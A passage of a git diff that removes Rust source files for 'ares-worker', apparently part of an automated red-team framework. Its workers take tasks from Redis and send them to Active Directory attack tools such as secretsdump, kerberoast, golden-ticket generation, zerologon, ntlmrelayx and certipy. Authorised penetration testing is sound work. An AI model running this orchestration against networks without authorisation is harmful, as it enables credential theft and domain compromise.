already_written.insert("192.168.58.10".to_string()); - let entries = build_host_entries(&hosts, &already_written); - assert!(entries.is_empty()); // Already written - } - - #[test] - fn test_build_host_entries_skip_incomplete() { - let hosts = vec![ - make_host("", "dc01.contoso.local", true), - make_host("192.168.58.10", "", true), - ]; - let entries = build_host_entries(&hosts, &HashSet::new()); - assert!(entries.is_empty()); // Both missing required fields - } - - #[test] - fn test_build_host_entries_short_hostname() { - let hosts = vec![make_host("192.168.58.99", "fileserver", false)]; - let entries = build_host_entries(&hosts, &HashSet::new()); - assert_eq!(entries.len(), 1); - // Short hostname without domain — no alias needed - assert_eq!(entries[0], "192.168.58.99 fileserver"); - } - - #[test] - fn test_build_host_entries_dc_subdomain() { - let hosts = vec![make_host("192.168.58.15", "dc02.north.contoso.local", true)]; - let entries = build_host_entries(&hosts, &HashSet::new()); - assert_eq!(entries.len(), 1); - assert_eq!( - entries[0], - "192.168.58.15 dc02.north.contoso.local dc02 north.contoso.local" - ); - } - - #[test] - fn test_build_host_entries_lowercase() { - let hosts = vec![make_host("192.168.58.10", "DC01.CONTOSO.LOCAL", true)]; - let entries = build_host_entries(&hosts, &HashSet::new()); - assert_eq!(entries.len(), 1); - assert!(entries[0].contains("dc01.contoso.local")); // Lowercased - } -} diff --git a/ares-worker/src/main.rs b/ares-worker/src/main.rs deleted file mode 100644 index 33e2fde5..00000000 --- a/ares-worker/src/main.rs +++ /dev/null @@ -1,161 +0,0 @@ -//! Ares Worker — the Rust binary that runs on worker pods. -//! -//! Owns the task consumption loop: -//! 1. BLPOP from Redis queue (`ares:tasks:{role}`) -//! 2. 
Execute agent tasks (native Rust tool execution) -//! 3. Push results back (`ares:results:{task_id}`) -//! -//! Heartbeat runs on a separate tokio task. -//! Graceful shutdown: finish current task before exiting on SIGTERM. - -#[cfg(feature = "blue")] -mod blue_task_loop; -mod config; -mod heartbeat; -mod hosts; -mod task_loop; -mod tool_check; -mod tool_executor; - -use std::sync::Arc; - -use tracing::{error, info}; - -#[tokio::main] -async fn main() -> anyhow::Result<()> { - // Initialize telemetry (console + OTLP when endpoint is configured) - let _telemetry = ares_core::telemetry::init_telemetry( - ares_core::telemetry::TelemetryConfig::new("ares-worker"), - ); - - // Parse config from environment - let config = config::WorkerConfig::from_env()?; - let mode_str = match config.mode { - config::WorkerMode::Task => "task", - config::WorkerMode::ToolExec => "tool_exec", - #[cfg(feature = "blue")] - config::WorkerMode::BlueTask => "blue_task", - }; - info!( - agent = %config.agent_name, - role = %config.worker_role, - mode = mode_str, - pod = %config.pod_name, - operation_id = ?config.operation_id, - task_timeout_secs = config.task_timeout.as_secs(), - "Ares worker starting" - ); - - // Single shared Redis connection — cloned cheaply to all subsystems - // Default response_timeout is 500ms which is too short for BRPOP - // blocking calls (5s+). Without this, the client-side timeout cancels - // the future but the server-side BRPOP remains, consuming queue items - // that get silently dropped. - let redis_client = redis::Client::open(config.redis_url.as_str())?; - let cm_config = redis::aio::ConnectionManagerConfig::new() - .set_response_timeout(Some(std::time::Duration::from_secs(30))); - let conn = redis_client - .get_connection_manager_with_config(cm_config) - .await?; - - // Shared shutdown signal - let shutdown = Arc::new(tokio::sync::Notify::new()); - let shutdown_signal = Arc::clone(&shutdown); - - // Spawn background heartbeat - let (_heartbeat_handle, status_tx) = heartbeat::spawn_heartbeat( - conn.clone(), - config.agent_name.clone(), - config.pod_name.clone(), - config.worker_role.clone(), - config.operation_id.clone(), - config.heartbeat_interval, - config.heartbeat_ttl, - Arc::clone(&shutdown), - ); - - // Check tool availability for this role and publish inventory - let inventory = tool_check::check_tools(&config.worker_role).await; - tool_check::publish_inventory(&mut conn.clone(), &config.agent_name, &inventory).await; - - // Spawn /etc/hosts sync if we have an operation ID - let _hosts_handle = config.operation_id.as_ref().map(|op_id| { - hosts::spawn_hosts_sync( - conn.clone(), - op_id.clone(), - config.agent_name.clone(), - Arc::clone(&shutdown), - ) - }); - - // Spawn SIGTERM/SIGINT handler - let shutdown_for_signal = Arc::clone(&shutdown_signal); - tokio::spawn(async move { - wait_for_shutdown_signal().await; - info!("Shutdown signal received, draining..."); - shutdown_for_signal.notify_waiters(); - }); - - // Run the appropriate loop based on worker mode - let result = match config.mode { - config::WorkerMode::Task => { - task_loop::run_task_loop(&config, conn, status_tx, shutdown_signal).await - } - config::WorkerMode::ToolExec => { - tool_executor::run_tool_exec_loop(&config, conn, status_tx, shutdown_signal).await - } - #[cfg(feature = "blue")] - config::WorkerMode::BlueTask => { - // Blue team mode requires an LLM provider - let model_spec = std::env::var("ARES_LLM_MODEL") - .unwrap_or_else(|_| "anthropic/claude-sonnet-4-20250514".to_string()); - let (provider, 
model_name) = match ares_llm::create_provider(&model_spec) { - Ok(p) => p, - Err(e) => { - error!("Failed to create LLM provider for blue worker: {e}"); - return Err(e); - } - }; - let dispatcher = std::sync::Arc::new(blue_task_loop::BlueLocalToolDispatcher::new()); - info!(model = %model_name, "Blue team worker using LLM"); - blue_task_loop::run_blue_task_loop( - &config, - conn, - provider, - dispatcher, - model_name, - status_tx, - shutdown_signal, - ) - .await - } - }; - - match &result { - Ok(()) => info!("Ares worker shut down cleanly"), - Err(e) => error!("Ares worker exited with error: {e}"), - } - - result -} - -/// Wait for SIGTERM or SIGINT (Ctrl-C). -async fn wait_for_shutdown_signal() { - #[cfg(unix)] - { - use tokio::signal::unix::{signal, SignalKind}; - let mut sigterm = signal(SignalKind::terminate()).expect("failed to register SIGTERM"); - let mut sigint = signal(SignalKind::interrupt()).expect("failed to register SIGINT"); - tokio::select! { - _ = sigterm.recv() => info!("Received SIGTERM"), - _ = sigint.recv() => info!("Received SIGINT"), - } - } - #[cfg(not(unix))] - { - tokio::signal::ctrl_c() - .await - .expect("failed to register Ctrl-C handler"); - info!("Received Ctrl-C"); - } -} diff --git a/ares-worker/src/task_loop/executor.rs b/ares-worker/src/task_loop/executor.rs deleted file mode 100644 index c70ef0c5..00000000 --- a/ares-worker/src/task_loop/executor.rs +++ /dev/null @@ -1,415 +0,0 @@ -//! Task execution — run_agent_task dispatches to ares-tools. -//! -//! The orchestrator submits high-level composite task types (e.g. "recon", -//! "credential_access") with a `technique`/`techniques` field in the payload. -//! This module expands those into individual tool calls that `ares_tools::dispatch` -//! understands, then parses the raw output into structured discoveries. - -use std::time::Duration; - -use serde_json::Value; -use tracing::{info, warn}; - -use super::types::AgentResult; - -/// Execute a tool natively in Rust via ares-tools. -/// -/// First attempts direct dispatch by `task_type`. If the task type is a -/// composite type (recon, credential_access, etc.), expands it into individual -/// tool calls based on the `technique`/`techniques` payload field. -/// -/// Tool outputs are parsed to extract structured discoveries (hosts, -/// credentials, hashes, vulnerabilities) that the orchestrator can consume. 
-pub async fn run_agent_task(
-    task_type: &str,
-    params: &serde_json::Value,
-    _timeout: Duration,
-) -> anyhow::Result<AgentResult> {
-    // Try expanding composite task types first
-    let tools = expand_task(task_type, params);
-
-    if tools.is_empty() {
-        // Direct tool dispatch (task_type IS the tool name)
-        info!(tool = task_type, "Executing tool natively");
-        let output = ares_tools::dispatch(task_type, params).await?;
-        let raw = output.combined_raw();
-        let discoveries = ares_tools::parsers::parse_tool_output(task_type, &raw, params);
-        return Ok(make_result_with_discoveries(output, discoveries));
-    }
-
-    // Run each expanded tool, collecting outputs and discoveries
-    let mut outputs = Vec::new();
-    let mut all_discoveries = Vec::new();
-    let mut any_error = false;
-
-    for (tool_name, tool_params) in &tools {
-        info!(tool = %tool_name, parent_task = task_type, "Executing expanded tool");
-        match ares_tools::dispatch(tool_name, tool_params).await {
-            Ok(output) => {
-                if !output.success {
-                    any_error = true;
-                }
-                let raw = output.combined_raw();
-                let combined = output.combined();
-                let disc = ares_tools::parsers::parse_tool_output(tool_name, &raw, tool_params);
-                all_discoveries.push(disc);
-                outputs.push(format!("=== {} ===\n{}", tool_name, combined));
-            }
-            Err(e) => {
-                warn!(tool = %tool_name, err = %e, "Expanded tool failed");
-                any_error = true;
-                outputs.push(format!("=== {} ===\nERROR: {}", tool_name, e));
-            }
-        }
-    }
-
-    let combined = outputs.join("\n\n");
-    let discoveries = ares_tools::parsers::merge_discoveries(&all_discoveries);
-    let error = if any_error {
-        Some("one or more tools had errors".to_string())
-    } else {
-        None
-    };
-
-    Ok(AgentResult {
-        output: combined,
-        error,
-        usage: None,
-        discoveries: Some(discoveries),
-    })
-}
-
-fn make_result_with_discoveries(output: ares_tools::ToolOutput, discoveries: Value) -> AgentResult {
-    let combined = output.combined();
-    let error = if output.success {
-        None
-    } else {
-        Some(format!("tool exited with code {:?}", output.exit_code))
-    };
-    AgentResult {
-        output: combined,
-        error,
-        usage: None,
-        discoveries: if discoveries.as_object().is_none_or(|o| o.is_empty()) {
-            None
-        } else {
-            Some(discoveries)
-        },
-    }
-}
-
-/// Expand a composite task type into individual (tool_name, params) pairs.
-///
-/// Returns an empty vec if the task_type is already a concrete tool name.
-fn expand_task(task_type: &str, params: &serde_json::Value) -> Vec<(String, serde_json::Value)> {
-    match task_type {
-        "recon" | "credential_access" | "privesc_enumeration" | "lateral_movement" | "coercion" => {
-            expand_technique_task(params)
-        }
-        "crack" => expand_crack_task(params),
-        "exploit" => expand_exploit_task(params),
-        // Already a concrete tool name — handled by direct dispatch
-        _ => Vec::new(),
-    }
-}
-
-/// Expand tasks that have `technique` (singular) or `techniques` (array) fields. 
-fn expand_technique_task(params: &serde_json::Value) -> Vec<(String, serde_json::Value)> { - let mut tools = Vec::new(); - let normalized = normalize_params(params); - - // Handle singular "technique" field - if let Some(technique) = params.get("technique").and_then(|v| v.as_str()) { - let tool_name = map_technique_to_tool(technique); - tools.push((tool_name, normalized.clone())); - return tools; - } - - // Handle "techniques" array - if let Some(techniques) = params.get("techniques").and_then(|v| v.as_array()) { - for tech in techniques { - if let Some(name) = tech.as_str() { - let tool_name = map_technique_to_tool(name); - tools.push((tool_name, normalized.clone())); - } - } - } - - tools -} - -/// Normalize orchestrator payload field names to what ares-tools expects. -/// -/// The orchestrator sends `target_ip` but tools expect `target`. -/// Credential objects are flattened into top-level fields. -fn normalize_params(params: &serde_json::Value) -> serde_json::Value { - let mut p = params.clone(); - if let Some(obj) = p.as_object_mut() { - // target_ip → target (tools expect "target") - if !obj.contains_key("target") { - if let Some(ip) = obj.get("target_ip").cloned() { - obj.insert("target".to_string(), ip); - } - } - // Also set "targets" for tools that want it (smb_sweep) - if !obj.contains_key("targets") { - if let Some(ip) = obj.get("target_ip").cloned() { - obj.insert("targets".to_string(), ip); - } - } - // Flatten credential object into top-level fields - if let Some(cred) = obj.get("credential").cloned() { - if let Some(cred_obj) = cred.as_object() { - for (k, v) in cred_obj { - if !obj.contains_key(k) { - obj.insert(k.clone(), v.clone()); - } - } - } - } - } - p -} - -/// Map technique names (from orchestrator payloads) to ares-tools dispatch names. -fn map_technique_to_tool(technique: &str) -> String { - match technique { - // Recon technique → tool mappings - "network_scan" => "nmap_scan".to_string(), - "user_enumeration" => "enumerate_users".to_string(), - "share_enumeration" => "enumerate_shares".to_string(), - "smb_enumeration" => "smb_sweep".to_string(), - "bloodhound_collect" => "run_bloodhound".to_string(), - "trust_enumeration" => "enumerate_domain_trusts".to_string(), - - // Credential access technique → tool mappings - "share_spider" => "smbclient_spider".to_string(), - "asrep_roast" | "asrep" => "asrep_roast".to_string(), - - // Most technique names already match tool names 1:1 - other => other.to_string(), - } -} - -/// Expand crack tasks to the appropriate cracking tool. -fn expand_crack_task(params: &serde_json::Value) -> Vec<(String, serde_json::Value)> { - let normalized = normalize_params(params); - let tool = if params - .get("use_john") - .and_then(|v| v.as_bool()) - .unwrap_or(false) - { - "crack_with_john" - } else { - "crack_with_hashcat" - }; - vec![(tool.to_string(), normalized)] -} - -/// Expand exploit tasks based on vuln_type. 
-fn expand_exploit_task(params: &serde_json::Value) -> Vec<(String, serde_json::Value)> {
-    let vuln_type = params
-        .get("vuln_type")
-        .and_then(|v| v.as_str())
-        .unwrap_or("");
-
-    let tool = match vuln_type {
-        "constrained_delegation" | "unconstrained_delegation" => "s4u_attack",
-        "esc1" | "adcs_esc1" => "certipy_request",
-        "esc4" | "adcs_esc4" => "certipy_esc4_full_chain",
-        "esc8" | "adcs_esc8" => "ntlmrelayx_to_adcs",
-        "krbtgt_hash" => "generate_golden_ticket",
-        "rbcd" => "rbcd_write",
-        "nopac" | "samaccountname" => "nopac",
-        "printnightmare" => "printnightmare",
-        "zerologon" => "zerologon_check",
-        "krbrelayup" => "krbrelayup",
-        "mssql_access" => "mssql_enum_impersonation",
-        _ => {
-            warn!(vuln_type, "No tool mapping for exploit vuln_type");
-            return Vec::new();
-        }
-    };
-
-    vec![(tool.to_string(), normalize_params(params))]
-}
-
-#[cfg(test)]
-mod tests {
-    use super::*;
-    use serde_json::json;
-
-    // --- normalize_params ---
-
-    #[test]
-    fn test_normalize_params_target_ip_to_target() {
-        let params = json!({"target_ip": "192.168.58.10"});
-        let norm = normalize_params(&params);
-        assert_eq!(norm["target"], "192.168.58.10");
-        assert_eq!(norm["targets"], "192.168.58.10");
-        // Original field preserved
-        assert_eq!(norm["target_ip"], "192.168.58.10");
-    }
-
-    #[test]
-    fn test_normalize_params_existing_target_not_overwritten() {
-        let params = json!({"target": "192.168.58.10", "target_ip": "192.168.58.20"});
-        let norm = normalize_params(&params);
-        assert_eq!(norm["target"], "192.168.58.10"); // not overwritten
-    }
-
-    #[test]
-    fn test_normalize_params_credential_flattening() {
-        let params = json!({
-            "target_ip": "192.168.58.10",
-            "credential": {
-                "username": "admin",
-                "password": "P@ss1",
-                "domain": "contoso.local"
-            }
-        });
-        let norm = normalize_params(&params);
-        assert_eq!(norm["username"], "admin");
-        assert_eq!(norm["password"], "P@ss1");
-        assert_eq!(norm["domain"], "contoso.local");
-    }
-
-    #[test]
-    fn test_normalize_params_existing_fields_not_overwritten_by_cred() {
-        let params = json!({
-            "domain": "fabrikam.local",
-            "credential": {
-                "domain": "contoso.local",
-                "username": "admin",
-                "password": "pass"
-            }
-        });
-        let norm = normalize_params(&params);
-        assert_eq!(norm["domain"], "fabrikam.local"); // not overwritten
-    }
-
-    // --- map_technique_to_tool ---
-
-    #[test]
-    fn test_map_technique_to_tool_mapped() {
-        assert_eq!(map_technique_to_tool("network_scan"), "nmap_scan");
-        assert_eq!(map_technique_to_tool("user_enumeration"), "enumerate_users");
-        assert_eq!(
-            map_technique_to_tool("share_enumeration"),
-            "enumerate_shares"
-        );
-        assert_eq!(map_technique_to_tool("smb_enumeration"), "smb_sweep");
-        assert_eq!(
-            map_technique_to_tool("bloodhound_collect"),
-            "run_bloodhound"
-        );
-        assert_eq!(
-            map_technique_to_tool("trust_enumeration"),
-            "enumerate_domain_trusts"
-        );
-        assert_eq!(map_technique_to_tool("share_spider"), "smbclient_spider");
-        assert_eq!(map_technique_to_tool("asrep_roast"), "asrep_roast");
-        assert_eq!(map_technique_to_tool("asrep"), "asrep_roast");
-    }
-
-    #[test]
-    fn test_map_technique_to_tool_passthrough() {
-        assert_eq!(map_technique_to_tool("nmap_scan"), "nmap_scan");
-        assert_eq!(map_technique_to_tool("secretsdump"), "secretsdump");
-        assert_eq!(map_technique_to_tool("kerberoast"), "kerberoast");
-    }
-
-    // --- expand_task ---
-
-    #[test]
-    fn test_expand_task_recon_with_techniques() {
-        let params = json!({"techniques": ["network_scan", "user_enumeration"], "target_ip": "192.168.58.10"});
-        let tools = expand_task("recon", &params); 
-        assert_eq!(tools.len(), 2);
-        assert_eq!(tools[0].0, "nmap_scan");
-        assert_eq!(tools[1].0, "enumerate_users");
-        // Params should be normalized
-        assert_eq!(tools[0].1["target"], "192.168.58.10");
-    }
-
-    #[test]
-    fn test_expand_task_credential_access_single_technique() {
-        let params = json!({"technique": "secretsdump", "target_ip": "192.168.58.10"});
-        let tools = expand_task("credential_access", &params);
-        assert_eq!(tools.len(), 1);
-        assert_eq!(tools[0].0, "secretsdump");
-    }
-
-    #[test]
-    fn test_expand_task_concrete_tool_returns_empty() {
-        let params = json!({"target": "192.168.58.10"});
-        let tools = expand_task("nmap_scan", &params);
-        assert!(tools.is_empty());
-    }
-
-    // --- expand_crack_task ---
-
-    #[test]
-    fn test_expand_crack_task_default_hashcat() {
-        let params = json!({"hash_value": "abc123", "hash_type": "ntlm"});
-        let tools = expand_crack_task(&params);
-        assert_eq!(tools.len(), 1);
-        assert_eq!(tools[0].0, "crack_with_hashcat");
-    }
-
-    #[test]
-    fn test_expand_crack_task_john() {
-        let params = json!({"hash_value": "abc123", "use_john": true});
-        let tools = expand_crack_task(&params);
-        assert_eq!(tools[0].0, "crack_with_john");
-    }
-
-    // --- expand_exploit_task ---
-
-    #[test]
-    fn test_expand_exploit_delegation() {
-        let params = json!({"vuln_type": "constrained_delegation", "target_ip": "192.168.58.10"});
-        let tools = expand_exploit_task(&params);
-        assert_eq!(tools.len(), 1);
-        assert_eq!(tools[0].0, "s4u_attack");
-    }
-
-    #[test]
-    fn test_expand_exploit_adcs_variants() {
-        for (vuln_type, expected_tool) in &[
-            ("esc1", "certipy_request"),
-            ("adcs_esc1", "certipy_request"),
-            ("esc4", "certipy_esc4_full_chain"),
-            ("esc8", "ntlmrelayx_to_adcs"),
-        ] {
-            let params = json!({"vuln_type": vuln_type});
-            let tools = expand_exploit_task(&params);
-            assert_eq!(
-                tools[0].0, *expected_tool,
-                "Failed for vuln_type: {vuln_type}"
-            );
-        }
-    }
-
-    #[test]
-    fn test_expand_exploit_other_types() {
-        for (vuln_type, expected) in &[
-            ("krbtgt_hash", "generate_golden_ticket"),
-            ("rbcd", "rbcd_write"),
-            ("nopac", "nopac"),
-            ("zerologon", "zerologon_check"),
-            ("mssql_access", "mssql_enum_impersonation"),
-        ] {
-            let params = json!({"vuln_type": vuln_type});
-            let tools = expand_exploit_task(&params);
-            assert_eq!(tools[0].0, *expected, "Failed for vuln_type: {vuln_type}");
-        }
-    }
-
-    #[test]
-    fn test_expand_exploit_unknown_type_empty() {
-        let params = json!({"vuln_type": "unknown_vuln"});
-        let tools = expand_exploit_task(&params);
-        assert!(tools.is_empty());
-    }
-}
diff --git a/ares-worker/src/task_loop/mod.rs b/ares-worker/src/task_loop/mod.rs
deleted file mode 100644
index e59e344e..00000000
--- a/ares-worker/src/task_loop/mod.rs
+++ /dev/null
@@ -1,236 +0,0 @@
-//! Core task consumption loop.
-//!
-//! ```text
-//! loop {
-//!   1. BRPOP from ares:tasks:{role}
-//!   2. Deserialize TaskMessage
-//!   3. Update task status to "running"
-//!   4. Execute agent task (native Rust)
-//!   5. Parse result
-//!   6. Serialize TaskResult
-//!   7. LPUSH to ares:results:{task_id}
-//!   8. Update task status to "completed" or "failed"
-//!   9. Refresh heartbeat status
-//! }
-//! 
```
-
-mod executor;
-mod result_handler;
-pub mod types;
-
-use types::TaskMessage;
-
-use std::sync::Arc;
-use std::time::Duration;
-
-use tracing::{debug, error, info, warn};
-
-use crate::config::WorkerConfig;
-use crate::heartbeat::WorkerStatus;
-
-// ─── Redis key prefixes (must match Python's RedisTaskQueue) ─────────────────
-
-const TASK_QUEUE_PREFIX: &str = "ares:tasks";
-const RESULT_QUEUE_PREFIX: &str = "ares:results";
-const TASK_STATUS_PREFIX: &str = "ares:task_status";
-
-/// TTL for task status keys — 24 hours, matches Python.
-const TASK_STATUS_TTL: i64 = 60 * 60 * 24;
-
-/// TTL for result keys — 24 hours, matches Python's `RESULT_TTL`.
-const RESULT_TTL: i64 = 60 * 60 * 24;
-
-// ─── Task loop ───────────────────────────────────────────────────────────────
-
-/// Run the main task consumption loop until shutdown is signalled.
-pub async fn run_task_loop(
-    config: &WorkerConfig,
-    conn: redis::aio::ConnectionManager,
-    status_tx: tokio::sync::watch::Sender<WorkerStatus>,
-    shutdown: Arc<tokio::sync::Notify>,
-) -> anyhow::Result<()> {
-    let queue_key = format!("{TASK_QUEUE_PREFIX}:{}", config.worker_role);
-    info!(
-        queue = %queue_key,
-        agent = %config.agent_name,
-        "Starting task loop"
-    );
-
-    let mut conn = conn;
-
-    // Exponential backoff state for connection errors
-    let mut retry_delay = Duration::from_secs(1);
-    let max_retry_delay = Duration::from_secs(60);
-
-    loop {
-        // Race BRPOP against shutdown signal
-        let poll_result = tokio::select! {
-            result = poll_task(&mut conn, &queue_key, config.poll_timeout) => result,
-            _ = shutdown.notified() => {
-                info!("Task loop: shutdown signalled, finishing");
-                break;
-            }
-        };
-
-        match poll_result {
-            Ok(Some(task)) => {
-                // Reset backoff on successful poll
-                retry_delay = Duration::from_secs(1);
-
-                // Update heartbeat status to busy
-                let _ = status_tx.send(WorkerStatus {
-                    status: "busy".to_string(),
-                    current_task: Some(task.task_id.clone()),
-                });
-
-                // Execute the task — runs to completion even if shutdown arrives mid-task
-                result_handler::process_task(&mut conn, config, &task).await;
-
-                // Update heartbeat status back to idle
-                let _ = status_tx.send(WorkerStatus {
-                    status: "idle".to_string(),
-                    current_task: None,
-                });
-            }
-            Ok(None) => {
-                // No task available (BRPOP timeout), just loop
-                retry_delay = Duration::from_secs(1);
-            }
-            Err(e) => {
-                let error_str = e.to_string().to_lowercase();
-                let is_conn_error = [
-                    "connection",
-                    "connect",
-                    "closed",
-                    "timeout",
-                    "broken pipe",
-                    "reset",
-                ]
-                .iter()
-                .any(|kw| error_str.contains(kw));
-
-                if is_conn_error {
-                    // ConnectionManager auto-reconnects; just back off before retrying
-                    warn!(
-                        delay_secs = retry_delay.as_secs(),
-                        "Task loop: connection error, retrying: {e}"
-                    );
-                    tokio::select! {
-                        _ = tokio::time::sleep(retry_delay) => {}
-                        _ = shutdown.notified() => break,
-                    }
-                    retry_delay = (retry_delay * 2).min(max_retry_delay);
-                } else {
-                    error!("Task loop: non-connection error: {e}");
-                    tokio::select! {
-                        _ = tokio::time::sleep(Duration::from_secs(5)) => {}
-                        _ = shutdown.notified() => break,
-                    }
-                    retry_delay = Duration::from_secs(1);
-                }
-            }
-        }
-    }
-
-    Ok(())
-}
-
-/// BRPOP from the task queue with timeout.
-/// Returns `Ok(None)` on timeout (no task available). 
-async fn poll_task(
-    conn: &mut redis::aio::ConnectionManager,
-    queue_key: &str,
-    timeout: Duration,
-) -> anyhow::Result<Option<TaskMessage>> {
-    // BRPOP returns Option<(key, value)>
-    let result: Option<(String, String)> = redis::cmd("BRPOP")
-        .arg(queue_key)
-        .arg(timeout.as_secs() as i64)
-        .query_async(conn)
-        .await?;
-
-    match result {
-        Some((_key, data)) => {
-            let task: TaskMessage = serde_json::from_str(&data)?;
-            debug!(task_id = %task.task_id, task_type = %task.task_type, "Received task");
-            Ok(Some(task))
-        }
-        None => Ok(None),
-    }
-}
-
-#[cfg(test)]
-mod tests {
-    use super::*;
-    use types::TaskResult;
-
-    #[test]
-    fn task_message_roundtrip() {
-        let msg = TaskMessage {
-            task_id: "task-123".into(),
-            task_type: "recon".into(),
-            source_agent: "orchestrator".into(),
-            target_agent: "ares-recon-0".into(),
-            payload: serde_json::json!({"target_ip": "192.168.58.1"}),
-            priority: 3,
-            created_at: Some("2026-04-07T10:00:00Z".into()),
-            callback_queue: None,
-        };
-        let json = serde_json::to_string(&msg).unwrap();
-        let msg2: TaskMessage = serde_json::from_str(&json).unwrap();
-        assert_eq!(msg.task_id, msg2.task_id);
-        assert_eq!(msg.task_type, msg2.task_type);
-        assert_eq!(msg.priority, msg2.priority);
-    }
-
-    #[test]
-    fn task_message_default_priority() {
-        let json = r#"{
-            "task_id": "t1",
-            "task_type": "recon",
-            "source_agent": "orch",
-            "target_agent": "recon-0",
-            "payload": {}
-        }"#;
-        let msg: TaskMessage = serde_json::from_str(json).unwrap();
-        assert_eq!(msg.priority, 5); // default
-    }
-
-    #[test]
-    fn task_result_success() {
-        let r = TaskResult::success(
-            "t1",
-            serde_json::json!({"output": "done"}),
-            "pod-0",
-            "ares-recon",
-        );
-        assert!(r.success);
-        assert!(r.error.is_none());
-        assert!(r.result.is_some());
-        assert!(r.completed_at.is_some());
-        assert_eq!(r.worker_pod.as_deref(), Some("pod-0"));
-    }
-
-    #[test]
-    fn task_result_failure() {
-        let r = TaskResult::failure("t1", "timeout".into(), None, "pod-0", "ares-recon");
-        assert!(!r.success);
-        assert_eq!(r.error.as_deref(), Some("timeout"));
-        assert!(r.result.is_none());
-    }
-
-    #[test]
-    fn task_result_skip_serializing_none() {
-        let r = TaskResult::success("t1", serde_json::json!("ok"), "pod", "agent");
-        let json = serde_json::to_string(&r).unwrap();
-        // error field should be absent (skip_serializing_if = "Option::is_none")
-        assert!(!json.contains("\"error\""));
-    }
-
-    #[test]
-    fn redis_key_prefixes() {
-        assert_eq!(TASK_QUEUE_PREFIX, "ares:tasks");
-        assert_eq!(RESULT_QUEUE_PREFIX, "ares:results");
-        assert_eq!(TASK_STATUS_PREFIX, "ares:task_status");
-    }
-}
diff --git a/ares-worker/src/task_loop/result_handler.rs b/ares-worker/src/task_loop/result_handler.rs
deleted file mode 100644
index 62b7a6ca..00000000
--- a/ares-worker/src/task_loop/result_handler.rs
+++ /dev/null
@@ -1,215 +0,0 @@
-//! Result processing — build TaskResult, push to Redis, track token usage.
-
-use chrono::Utc;
-use redis::AsyncCommands;
-use tracing::{debug, error, info, warn};
-
-use ares_core::token_usage;
-
-use crate::config::WorkerConfig;
-
-use super::executor::run_agent_task;
-use super::types::{TaskMessage, TaskResult};
-use super::{RESULT_QUEUE_PREFIX, RESULT_TTL, TASK_STATUS_PREFIX, TASK_STATUS_TTL};
-
-/// Process a single task: set status, run agent, push result. 
-pub async fn process_task( - conn: &mut redis::aio::ConnectionManager, - config: &WorkerConfig, - task: &TaskMessage, -) { - let started_at = Utc::now().to_rfc3339(); - - info!( - task_id = %task.task_id, - task_type = %task.task_type, - agent = %config.agent_name, - "Processing task" - ); - - // 1. Set task status to "running" - if let Err(e) = set_task_status( - conn, - &task.task_id, - "running", - &serde_json::json!({ - "operation_id": config.operation_id, - "role": config.worker_role, - "agent_name": config.agent_name, - "pod_name": config.pod_name, - "task_type": task.task_type, - "payload": task.payload, - "started_at": started_at, - }), - ) - .await - { - warn!(task_id = %task.task_id, "Failed to set task status to running: {e}"); - } - - // 2. Run the agent task - let agent_result = run_agent_task(&task.task_type, &task.payload, config.task_timeout).await; - - // 3. Extract token usage before consuming agent_result (for Redis tracking) - let usage_for_tracking = agent_result.as_ref().ok().and_then(|ar| ar.usage.clone()); - - // 4. Build the result - let (task_result, final_status) = match agent_result { - Ok(ar) => { - if let Some(ref err) = ar.error { - // Agent returned an error (e.g., unsupported task, max steps, model refusal) - let result_payload = serde_json::json!({ - "output": ar.output, - "task_type": task.task_type, - }); - ( - TaskResult::failure( - &task.task_id, - err.clone(), - Some(result_payload), - &config.pod_name, - &config.agent_name, - ), - "failed", - ) - } else { - let mut result_payload = serde_json::json!({ - "output": ar.output, - "task_type": task.task_type, - }); - // Include usage metrics if available - if let Some(ref usage) = ar.usage { - result_payload["usage"] = serde_json::to_value(usage).unwrap_or_default(); - } - // Include structured discoveries parsed from tool output - if let Some(ref disc) = ar.discoveries { - if let Some(obj) = disc.as_object() { - for (k, v) in obj { - result_payload[k] = v.clone(); - } - } - } - ( - TaskResult::success( - &task.task_id, - result_payload, - &config.pod_name, - &config.agent_name, - ), - "completed", - ) - } - } - Err(e) => { - let error_msg = format!("{e}"); - error!( - task_id = %task.task_id, - "Agent task failed: {error_msg}" - ); - ( - TaskResult::failure( - &task.task_id, - error_msg, - None, - &config.pod_name, - &config.agent_name, - ), - "failed", - ) - } - }; - - // 5. Accumulate token usage to Redis (best-effort, never fails the task) - if let Some(ref usage) = usage_for_tracking { - if usage.total_tokens > 0 { - if let Some(ref op_id) = config.operation_id { - let model = usage.model.as_deref().unwrap_or(""); - if let Err(e) = token_usage::increment_token_usage( - conn, - op_id, - usage.input_tokens, - usage.output_tokens, - model, - ) - .await - { - debug!(task_id = %task.task_id, "Failed to increment token usage: {e}"); - } - } - } - } - - // 6. LPUSH result to ares:results:{task_id} - let result_key = format!("{RESULT_QUEUE_PREFIX}:{}", task.task_id); - match serde_json::to_string(&task_result) { - Ok(result_json) => { - if let Err(e) = push_result(conn, &result_key, &result_json).await { - error!(task_id = %task.task_id, "Failed to push result: {e}"); - } - } - Err(e) => { - error!(task_id = %task.task_id, "Failed to serialize result: {e}"); - } - } - - // 7. 
Update task status to final state
-    if let Err(e) = set_task_status(
-        conn,
-        &task.task_id,
-        final_status,
-        &serde_json::json!({
-            "operation_id": config.operation_id,
-            "role": config.worker_role,
-            "agent_name": config.agent_name,
-            "pod_name": config.pod_name,
-            "task_type": task.task_type,
-            "ended_at": Utc::now().to_rfc3339(),
-        }),
-    )
-    .await
-    {
-        warn!(task_id = %task.task_id, "Failed to set task status to {final_status}: {e}");
-    }
-
-    match final_status {
-        "completed" => info!(task_id = %task.task_id, "Task completed"),
-        _ => warn!(task_id = %task.task_id, "Task failed"),
-    }
-}
-
-/// Push a result to the result queue and set TTL.
-async fn push_result(
-    conn: &mut redis::aio::ConnectionManager,
-    result_key: &str,
-    result_json: &str,
-) -> anyhow::Result<()> {
-    conn.lpush::<_, _, ()>(result_key, result_json).await?;
-    conn.expire::<_, ()>(result_key, RESULT_TTL).await?;
-    Ok(())
-}
-
-/// Set task status in Redis with TTL.
-/// Matches Python's `set_task_status` — writes JSON to `ares:task_status:{task_id}`.
-async fn set_task_status(
-    conn: &mut redis::aio::ConnectionManager,
-    task_id: &str,
-    status: &str,
-    extra_fields: &serde_json::Value,
-) -> anyhow::Result<()> {
-    let key = format!("{TASK_STATUS_PREFIX}:{task_id}");
-    let mut data = extra_fields.clone();
-    if let Some(obj) = data.as_object_mut() {
-        obj.insert(
-            "status".to_string(),
-            serde_json::Value::String(status.to_string()),
-        );
-        obj.insert(
-            "updated_at".to_string(),
-            serde_json::Value::String(Utc::now().to_rfc3339()),
-        );
